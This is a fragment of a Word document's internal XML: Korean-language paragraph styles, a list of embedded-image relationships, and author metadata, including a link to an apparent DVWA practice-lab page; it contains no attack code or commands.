  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="각주"/>
    <w:uiPriority w:val="11"/>
    <w:pPr>
      <w:widowControl w:val="off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  <w:wordWrap w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="함초롬바탕" w:hAnsi="함초롬바탕" w:eastAsia="함초롬바탕"/>
      <w:color w:val="000000"/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="12">
    <w:name w:val="미주"/>
    <w:uiPriority w:val="12"/>
    <w:pPr>
      <w:widowControl w:val="off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  <w:wordWrap w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="함초롬바탕" w:hAnsi="함초롬바탕" w:eastAsia="함초롬바탕"/>
      <w:color w:val="000000"/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="13">
    <w:name w:val="메모"/>
    <w:uiPriority w:val="13"/>
    <w:pPr>
      <w:widowControl w:val="off"/>
      <w:autoSpaceDE w:val="off"/>
      <w:autoSpaceDN w:val="off"/>
      <w:snapToGrid/>
      <w:spacing w:before="0" w:after="0" w:line="312" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      <w:jc w:val="both"/>
      <w:textAlignment w:val="baseline"/>
      <w:wordWrap w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="함초롬돋움" w:hAnsi="함초롬돋움" w:eastAsia="함초롬돋움"/>
      <w:color w:val="000000"/>
      <w:spacing w:val="-4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bmp"  /><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.bmp"  /><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.bmp"  /><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.bmp"  /><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.bmp"  /><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.bmp"  /><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"  /><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.bmp"  /><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.bmp"  /><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.bmp"  /><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:root@10.4.0.3" TargetMode="External" /><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"  /><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"  /><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.bmp"  /><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.bmp"  /><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.bmp"  /><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.bmp"  /><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.bmp"  /><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.bmp"  /><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.bmp"  /><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.bmp"  /><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.bmp"  /><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.bmp"  /><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.bmp"  /><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.bmp"  /><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.bmp"  /><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.bmp"  /><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.bmp"  /><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dvwa.wj.com/vulnerabilities/exec/backdoor.php" TargetMode="External" /><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"  /><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"  /><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"  /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.bmp"  /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.bmp"  /><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.bmp"  /><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.bmp"  /><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.bmp"  /><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.bmp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8.0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TJ</dc:creator>
  <cp:lastModifiedBy>TJ</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-11T17:56:24.337</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-31T05:38:50.080</dcterms:modified>
</cp:coreProperties>
</file>